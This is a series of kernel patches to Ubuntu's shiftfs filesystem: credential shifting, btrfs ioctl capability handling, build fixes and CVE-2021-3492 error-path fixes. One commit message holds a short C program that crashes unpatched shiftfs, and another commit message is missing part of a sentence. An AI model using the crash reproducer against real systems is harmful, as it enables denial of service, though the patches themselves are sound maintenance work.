+@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	if (!hardlink) {
+ 		int err = security_dentry_create_files_as(dentry, mode,
+@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 	return 0;
+ }
+ 
+-static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
+-			 kuid_t kuid)
+-{
+-	uid_t uid = from_kuid(from, kuid);
+-	return make_kuid(to, uid);
+-}
+-
+-static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
+-			 kgid_t kgid)
+-{
+-	gid_t gid = from_kgid(from, kgid);
+-	return make_kgid(to, gid);
+-}
+-
+ static void shiftfs_copyattr(struct inode *from, struct inode *to)
+ {
+ 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
+@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+ 	err = setattr_prepare(dentry, attr);
+@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 		return err;
+ 
+ 	newattr = *attr;
+-	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+-	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
+ 
+ 	/*
+ 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
+@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	/* clear all caps to prevent bypassing capable() checks */
+ 	cap_clear((*newcred)->cap_bset);
+-- 
+2.39.2
+
+From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 17 Jan 2020 16:17:06 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
+ negative during unlink
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1860041
+
+All non-special files go through shiftfs_open() and have their dentry
+pinned through this codepath, preventing it from going negative. (For
+shiftfs the special files only include fifos and, in this case, unix
+sockets, since we don't allow character and block devices to be
+created.) But fifos don't use the shiftfs fops; they use the
+pipefifo_fops instead, which means they do not go through
+shiftfs_open() and thus don't have their dentry pinned that way. The
+lower dentries for such files can therefore go negative on unlink,
+causing segfaults. The following C program can be used to reproduce
+the crash:
+
+ #include <stdio.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <sys/types.h>
+ #include <sys/stat.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+
+ int main(int argc, char *argv[])
+ {
+        struct stat stat;
+
+        unlink("./bbb");
+
+        int ret = mknod("./bbb", S_IFIFO|0666, 0);
+        if (ret < 0)
+                exit(1);
+
+        int fd = open("./bbb", O_RDWR);
+        if (fd < 0)
+                exit(2);
+
+        if (unlink("./bbb"))
+                exit(4);
+
+        fstat(fd, &stat);
+
+        return 0;
+ }
+
+Similar to ecryptfs we need to dget() the lower dentry before calling
+vfs_unlink() on it and dput() it afterwards.
+
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 04fba4689eb6..3623d02b061e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	int err;
+ 	const struct cred *oldcred;
+ 
++	dget(lowerd);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	inode_unlock(loweri);
+ 
+ 	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 10 Apr 2020 16:55:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872094
+
+When shiftfs is nested we failed to create any files or access
+directories because we recorded the wrong creator credentials. We need
+to record the credentials of the creator of the lower mark mount of
+shiftfs. Otherwise we aren't privileged with respect to the shiftfs
+layer in the nesting case. This is similar to how we always record the
+user namespace of the base filesystem.
+
+Suggested-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3623d02b061e..5c39529d0a17 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * parent mark mountpoint.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
+@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * are identical.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+-		}
+ 
+-		cred_tmp = prepare_creds();
+-		if (!cred_tmp) {
+-			err = -ENOMEM;
+-			goto out_put_path;
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
+ 		}
+-		/* Don't override disk quota limits or use reserved space. */
+-		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
+-		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 20 May 2020 13:44:27 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
+ from other users
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1879688
+
+Stéphane reported a bug found during NorthSec, which makes heavy use
+of shiftfs. When a subvolume or snapshot is created as userns root in
+the container and then chowned to another user, a delete as the root
+user will fail.
+safety measure before calling btrfs ioctls. The only workable fix I
+could think of is to retain the CAP_DAC_OVERRIDE capability for the
+BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
+invasive.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5c39529d0a17..5d88193b41db 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
+ 	return ret;
+ }
+ 
+-static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
+@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 	cap_clear((*newcred)->cap_inheritable);
+ 	cap_clear((*newcred)->cap_permitted);
+ 
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
+ 	put_cred(override_creds(*newcred));
+ 	return 0;
+ }
+@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	if (ret)
+ 		goto out_restore;
+ 
+-	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
+ 	if (ret)
+ 		goto out_fdput;
+ 
+-- 
+2.39.2
+
+From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Mon, 15 Jun 2020 15:16:11 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
+ fiemap definitions
+Cc: mpagano@gentoo.org
+
+shiftfs FTBFS with 5.8-rc1:
+
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
+
+It seems that shiftfs was getting linux/fiemap.h included
+indirectly before. Include it directly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5d88193b41db..f9a5c94a9793 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -20,6 +20,7 @@
+ #include <linux/posix_acl.h>
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
++#include <linux/fiemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Tue, 23 Jun 2020 19:46:16 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
+ lookups
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872757
+
+Users reported that when creating temporary files shiftfs reports ESTALE.
+This can be reproduced via:
+
+import tempfile
+import os
+
+def test():
+    with tempfile.TemporaryFile() as fd:
+        fd.write("data".encode('utf-8'))
+        # re-open the file to get a read-only file descriptor
+        return open(f"/proc/self/fd/{fd.fileno()}", "r")
+
+def main():
+   fd = test()
+   fd.close()
+
+if __name__ == "__main__":
+    main()
+
+A similar issue was reported here:
+https://github.com/systemd/systemd/issues/14861
+
+Our revalidate methods were very opinionated about whether or not a
+lower dentry was valid: especially when it became unlinked, we simply
+invalidated the lower dentry, which caused the above bug to surface.
+This led to bugs where ESTALE was returned for e.g. temporary files
+that were created and directly re-opened afterwards through
+/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
+/proc/<pid>/fd/<nr>, LOOKUP_JUMP is set and the vfs will revalidate
+via d_weak_revalidate(). Since the file has been unhashed or has even
+already gone negative, we'd fail the open when we should have
+succeeded.
+
+Reported-by: Christian Kellner <ckellner@redhat.com>
+Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Link: https://github.com/systemd/systemd/issues/14861
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f9a5c94a9793..3cfd1881e9a2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+-- 
+2.39.2
+
+From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 30 Dec 2020 11:10:20 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
+Cc: mpagano@gentoo.org
+
+After commit:
+
+ 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
+
+__close_fd() has been renamed to close_fd() and the files parameter has
+been removed.
+
+Change the shiftfs code to properly support this change.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3cfd1881e9a2..4f1d94903557 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	__close_fd(current->files, fd);
++	close_fd(fd);
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	/*
+ 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
+ 	 * take a reference here to offset the one which will be put by
+-	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
+ 	 */
+ 	get_file(lfd.file);
+ 	lfd.flags |= FDPUT_FPUT;
+-- 
+2.39.2
+
+From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:01:06 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
+ shiftfs_btrfs_ioctl_fd_replace() error paths
+Cc: mpagano@gentoo.org
+
+Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
+allocated near the top of the function. Fix up these error paths to free
+the memory.
+
+Additionally, the addresses for the allocated memory are assigned to
+return parameters early in the function, before we know whether or not
+the function as a whole will return success. Wait to assign these values
+until we know the function was successful, and for good measure
+initialize the return parameters to NULL at the start.
+
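+A minimal sketch of that out-parameter discipline (illustrative
+userspace C; fill_args() and setup() are hypothetical names, not from
+the patch):
+
+ #include <stdlib.h>
+
+ struct args { int v; };
+
+ static int setup(struct args *a) { a->v = 1; return 0; } /* stand-in */
+
+ static int fill_args(struct args **out)
+ {
+   struct args *a;
+
+   *out = NULL;               /* callers see NULL on any failure */
+   a = malloc(sizeof(*a));
+   if (!a)
+     return -1;
+   if (setup(a)) {            /* every error path frees the memory */
+     free(a);
+     return -1;
+   }
+   *out = a;                  /* publish only once success is certain */
+   return 0;
+ }
+
+ int main(void) { struct args *a; return fill_args(&a); }
+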
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 28 +++++++++++++++++++++-------
+ 1 file changed, 21 insertions(+), 7 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4f1d94903557..8eab93691d62 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
++	*b1 = NULL;
++	*b2 = NULL;
++
+ 	if (!is_btrfs_snap_ioctl(cmd))
+ 		return 0;
+ 
+@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		if (IS_ERR(v1))
+ 			return PTR_ERR(v1);
+ 		oldfd = v1->fd;
+-		*b1 = v1;
+ 	} else {
+ 		v2 = memdup_user(arg, sizeof(*v2));
+ 		if (IS_ERR(v2))
+ 			return PTR_ERR(v2);
+ 		oldfd = v2->fd;
+-		*b2 = v2;
+ 	}
+ 
+ 	src = fdget(oldfd);
+-	if (!src.file)
+-		return -EINVAL;
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
+ 
+ 	ret = shiftfs_real_fdget(src.file, &lfd);
+ 	if (ret) {
+ 		fdput(src);
+-		return ret;
++		goto err_free;
+ 	}
+ 
+ 	/*
+@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+ 		fdput(lfd);
+-		return *newfd;
++		ret = *newfd;
++		goto err_free;
+ 	}
+ 
+ 	fd_install(*newfd, lfd.file);
+@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		v2->fd = oldfd;
+ 	}
+ 
+-	if (ret)
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:10:37 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
+ correctly
+Cc: mpagano@gentoo.org
+
+shiftfs expects copy_to_user() to return a negative error code on
+failure, when it actually returns the amount of uncopied data. Fix all
+code using copy_to_user() to handle the return values correctly.
+
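+For reference, the conventional kernel idiom looks like this (a hedged
+fragment, not taken from the patch):
+
+ /* copy_to_user() returns the number of bytes it could NOT copy,
+  * never a negative errno, so any non-zero result is converted: */
+ if (copy_to_user(arg, v1, sizeof(*v1)))
+         return -EFAULT;
+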
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8eab93691d62..abeb7db3b9be 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+-	return ret;
++	return ret ? -EFAULT: 0;
+ }
+ 
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		*b2 = v2;
+ 	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
+ 	}
+ 
+ 	return ret;
+-- 
+2.39.2
+
+From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Mon, 9 Aug 2021 17:15:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1939301
+
+Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
+caused a regression for us. It states:
+
+> default_file_splice_write is the last piece of generic code that uses
+> set_fs to make the uaccess routines operate on kernel pointers.  It
+> implements a "fallback loop" for splicing from files that do not actually
+> provide a proper splice_read method.  The usual file systems and other
+> high bandwidth instances all provide a ->splice_read, so this just removes
+> support for various device drivers and procfs/debugfs files.  If splice
+> support for any of those turns out to be important it can be added back
+> by switching them to the iter ops and using generic_file_splice_read.
+
+this means that currently all workloads making use of sendfile() on
+shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
+by providing explicit .splice_read() and .splice_write() methods,
+which just restores the status quo, and we keep using the generic
+methods provided by the vfs.
+
+Cc: Seth Forshee <sforshee@kernel.org>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index abeb7db3b9be..f5f6d8d8144e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.copy_file_range	= shiftfs_copy_file_range,
+ 	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
+-- 
+2.39.2
+
+From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Thu, 20 Jan 2022 16:55:24 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
+Cc: mpagano@gentoo.org
+
+WARNING: after this change we may see some regressions if shiftfs is
+used with filesystem namespaces.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 64 insertions(+), 43 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f5f6d8d8144e..76c54bc12018 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(lowerd, name, value, size, flags);
++	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_getxattr(lowerd, name, value, size);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 	return err;
+ }
+ 
+-static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(lowerd, name);
++	err = vfs_removexattr(ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ }
+ 
+ static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, const void *value, size_t size,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(dentry, name);
+-	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(ns, dentry, name);
++	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct user_namespace *ns,
++				 struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(inode, diri, mode);
++		inode_init_owner(ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
